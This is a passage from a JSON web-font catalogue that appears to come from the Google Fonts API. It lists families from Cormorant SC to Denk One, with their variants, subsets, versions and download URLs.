\"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmEBUU_R3y8DOWGA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cormorant Unicase\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9N_tucv7Gy0DRzS.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_QiZUaILtOqhqgDeXoF_n1_fTGX-vTnsMnx3C9.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9Mnt-cv7Gy0DRzS.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9MLsOcv7Gy0DRzS.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9Nvsecv7Gy0DRzS.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cormorant Upright\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1N5phDsU9X6RPzQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/cormorantupright/v18/VuJrdM3I2Y35poFONtLdafkUCHw1y2vVjjTkeMnz.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1MhpxDsU9X6RPzQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1MNoBDsU9X6RPzQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1NpoRDsU9X6RPzQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Courgette\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/courgette/v13/wEO_EBrAnc9BLjLQAUkFUfAL3EsHiA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Courier Prime\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/courierprime/v7/u-450q2lgwslOqpF_6gQ8kELWwZjW-_-tvg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/courierprime/v7/u-4n0q2lgwslOqpF_6gQ8kELawRpX837pvjxPA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/courierprime/v7/u-4k0q2lgwslOqpF_6gQ8kELY7pMf-fVqvHoJXw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/courierprime/v7/u-4i0q2lgwslOqpF_6gQ8kELawRR4-LfrtPtNXyeAg.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cousine\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cousine/v25/d6lIkaiiRdih4SpPzSMlzTbtz9k.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cousine/v25/d6lKkaiiRdih4SpP_SEvyRTo39l8hw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cousine/v25/d6lNkaiiRdih4SpP9Z8K6T7G09BlnmQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cousine/v25/d6lPkaiiRdih4SpP_SEXdTvM1_JgjmRpOA.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Coustard\",\n      \"variants\": [\n        \"regular\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/coustard/v16/3XFpErgg3YsZ5fqUU9UPvWXuROTd.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/coustard/v16/3XFuErgg3YsZ5fqUU-2LkEHmb_jU3eRL.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Covered By Your Grace\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/coveredbyyourgrace/v15/QGYwz-AZahWOJJI9kykWW9mD6opopoqXSOS0FgItq6bFIg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Crafty Girls\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/craftygirls/v16/va9B4kXI39VaDdlPJo8N_NvuQR37fF3Wlg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Creepster\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/creepster/v13/AlZy_zVUqJz4yMrniH4hdXf4XB0Tow.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Crete Round\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/creteround/v14/55xoey1sJNPjPiv1ZZZrxJ1827zAKnxN.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/creteround/v14/55xqey1sJNPjPiv1ZZZrxK1-0bjiL2xNhKc.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Crimson Pro\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZTm18OJE_VNWoyQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZkG18OJE_VNWoyQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZzm18OJE_VNWoyQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZ_G18OJE_VNWoyQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZEGp8OJE_VNWoyQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZKWp8OJE_VNWoyQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZTmp8OJE_VNWoyQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZZ2p8OJE_VNWoyQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi4Ue5s7dtC4yZNE.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi7Ke5s7dtC4yZNE.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi6Ue5s7dtC4yZNE.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi6me5s7dtC4yZNE.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi5KfJs7dtC4yZNE.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi5zfJs7dtC4yZNE.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi4UfJs7dtC4yZNE.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi49fJs7dtC4yZNE.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Crimson Text\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/crimsontext/v19/wlp2gwHKFkZgtmSR3NB0oRJvaAJSA_JN3Q.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/crimsontext/v19/wlpogwHKFkZgtmSR3NB0oRJfaghWIfdd3ahG.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/crimsontext/v19/wlppgwHKFkZgtmSR3NB0oRJXsCx2C9lR1LFffg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/crimsontext/v19/wlprgwHKFkZgtmSR3NB0oRJfajCOD9NV9rRPfrKu.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/crimsontext/v19/wlppgwHKFkZgtmSR3NB0oRJX1C12C9lR1LFffg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/crimsontext/v19/wlprgwHKFkZgtmSR3NB0oRJfajDqDtNV9rRPfrKu.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Croissant One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/croissantone/v20/3y9n6bU9bTPg4m8NDy3Kq24UM3pqn5cdJ-4.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Crushed\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/crushed/v25/U9Mc6dym6WXImTlFT1kfuIqyLzA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cuprum\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmg-X6ZjzSJjQjgnU.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmg9f6ZjzSJjQjgnU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmgzv9ZjzSJjQjgnU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmgwL9ZjzSJjQjgnU.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25jn_YIhYmknUPEA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25vH_YIhYmknUPEA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25UHjYIhYmknUPEA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25aXjYIhYmknUPEA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cute Font\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cutefont/v20/Noaw6Uny2oWPbSHMrY6vmJNVNC9hkw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cutive\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cutive/v17/NaPZcZ_fHOhV3Ip7T_hDoyqlZQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cutive Mono\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cutivemono/v14/m8JWjfRfY7WVjVi2E-K9H5RFRG-K3Mud.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"DM Mono\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/dmmono/v10/aFTR7PB1QTsUX8KYvrGyIYSnbKX9Rlk.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/dmmono/v10/aFTT7PB1QTsUX8KYth-orYataIf4VllXuA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/dmmono/v10/aFTU7PB1QTsUX8KYhh2aBYyMcKw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/dmmono/v10/aFTW7PB1QTsUX8KYth-QAa6JYKzkXw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/dmmono/v10/aFTR7PB1QTsUX8KYvumzIYSnbKX9Rlk.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/dmmono/v10/aFTT7PB1QTsUX8KYth-o9YetaIf4VllXuA.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"DM Sans\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dmsans/v11/rP2Hp2ywxg089UriOZSCHBeHFl0.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/dmsans/v11/rP2Fp2ywxg089UriCZaIGDWCBl0O8Q.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/dmsans/v11/rP2Cp2ywxg089UriAWCrOB-sClQX6Cg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/dmsans/v11/rP2Ap2ywxg089UriCZaw7BymDnYS-Cjk6Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/dmsans/v11/rP2Cp2ywxg089UriASitOB-sClQX6Cg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/dmsans/v11/rP2Ap2ywxg089UriCZawpBqmDnYS-Cjk6Q.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"DM Serif Display\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dmserifdisplay/v11/-nFnOHM81r4j6k0gjAW3mujVU2B2K_d709jy92k.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/dmserifdisplay/v11/-nFhOHM81r4j6k0gjAW3mujVU2B2G_Vx1_r352np3Q.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"DM Serif Text\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dmseriftext/v11/rnCu-xZa_krGokauCeNq1wWyafOPXHIJErY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/dmseriftext/v11/rnCw-xZa_krGokauCeNq1wWyWfGFWFAMArZKqQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Damion\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/damion/v14/hv-XlzJ3KEUe_YZUbWY3MTFgVg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dancing Script\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSoHTeB9ptDqpw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BAyoHTeB9ptDqpw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7B7y0HTeB9ptDqpw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/dancingscript/v24/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7B1i0HTeB9ptDqpw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dangrek\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dangrek/v26/LYjCdG30nEgoH8E2gCNqqVIuTN4.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Darker Grotesque\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVoxr2AW8hTOsXsX0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MH6cuh-mLQlC4BKCtayOfARkSVm7beJWcKUOI.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVo0L3AW8hTOsXsX0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVo27wAW8hTOsXsX0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVowrxAW8hTOsXsX0.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVoxbyAW8hTOsXsX0.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/darkergrotesque/v7/U9MA6cuh-mLQlC4BKCtayOfARkSVozLzAW8hTOsXsX0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"David Libre\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/davidlibre/v13/snfus0W_99N64iuYSvp4W_l86p6TYS-Y.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/davidlibre/v13/snfzs0W_99N64iuYSvp4W8GIw7qbSjORSo9W.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/davidlibre/v13/snfzs0W_99N64iuYSvp4W8HAxbqbSjORSo9W.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dawning of a New Day\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dawningofanewday/v16/t5t_IQMbOp2SEwuncwLRjMfIg1yYit_nAz8bhWJGNoBE.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Days One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/daysone/v14/mem9YaCnxnKRiYZOCLYVeLkWVNBt.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dekko\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dekko/v19/46khlb_wWjfSrttFR0vsfl1B.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Dela Gothic One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/delagothicone/v10/~ChEKD0RlbGEgR290aGljIE9uZSAAKgQIARgB.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Delius\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/delius/v15/PN_xRfK0pW_9e1rtYcI-jT3L_w.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Delius Swash Caps\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/deliusswashcaps/v19/oY1E8fPLr7v4JWCExZpWebxVKORpXXedKmeBvEYs.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Delius Unicase\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/deliusunicase/v26/845BNMEwEIOVT8BmgfSzIr_6mmLHd-73LXWs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/deliusunicase/v26/845CNMEwEIOVT8BmgfSzIr_6mlp7WMr_BmmlS5aw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Della Respira\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/dellarespira/v18/RLp5K5v44KaueWI6iEJQBiGPRfkSu6EuTHo.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Denk One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/denkone/v15/dg4m_pzhrqcFb2IzROtHpbglShon.ttf\"\n      },\n      